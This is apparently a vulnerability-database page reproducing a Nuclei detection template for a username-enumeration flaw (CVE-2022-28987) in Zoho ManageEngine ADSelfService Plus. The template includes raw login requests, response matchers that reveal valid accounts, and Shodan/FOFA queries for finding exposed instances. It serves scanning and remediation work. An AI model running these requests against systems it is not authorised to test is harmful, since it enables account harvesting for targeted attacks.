| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2022-28987 | 20 May 202203:15 | – | attackerkb | |
| CVE-2022-28987 | 20 May 202207:30 | – | circl | |
| ZOHO ManageEngine ADSelfService Plus 安全漏洞 | 20 May 202200:00 | – | cnnvd | |
| CVE-2022-28987 | 20 May 202202:10 | – | cve | |
| CVE-2022-28987 | 20 May 202202:10 | – | cvelist | |
| EUVD-2022-33418 | 3 Oct 202520:07 | – | euvd | |
| CVE-2022-28987 | 20 May 202203:15 | – | nvd | |
| CVE-2022-28987 | 20 May 202203:15 | – | osv | |
| Design/Logic Flaw | 20 May 202203:15 | – | prion | |
| PT-2022-19345 | 20 May 202200:00 | – | ptsecurity |
id: CVE-2022-28987
info:
name: Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration
author: ritikchaddha
severity: medium
description: |
Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987). The Forgot Password functionality responds differently for existing and non-existing users, allowing attackers to enumerate valid usernames.
impact: |
Attackers can enumerate valid usernames, aiding targeted attacks or account harvesting.
remediation: |
Update to version 6202 or later.
reference:
- https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-28987
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-28987
epss-score: 0.09705
epss-percentile: 0.94914
cwe-id: CWE-203
metadata:
max-request: 2
verified: false
shodan-query: http.title:"ADSelfService Plus"
fofa-query: title="ADSelfService Plus"
tags: cve,cve2022,zoho,manageengine,user-enum,adselfservice,vkev
http:
- raw:
- |
POST /ServletAPI/accounts/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
loginName=asdfnonexistent
- |
POST /ServletAPI/accounts/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
loginName=Guest
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'contains(body, "eSTATUS\":\"Permission Denied")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
- type: dsl
dsl:
- 'contains(body, "eSTATUS\":\"Your account has been disabled")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
# digest: 490a004630440220167ffa80a6eb52f1cb0d41732c412254305473e40c6a8b18c9cb1ebb5a5d108f022057fb8a33a2dd2d93255ef3263cbab5c95e3bffa9e7be6932b6e28afb9cdce9e8:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation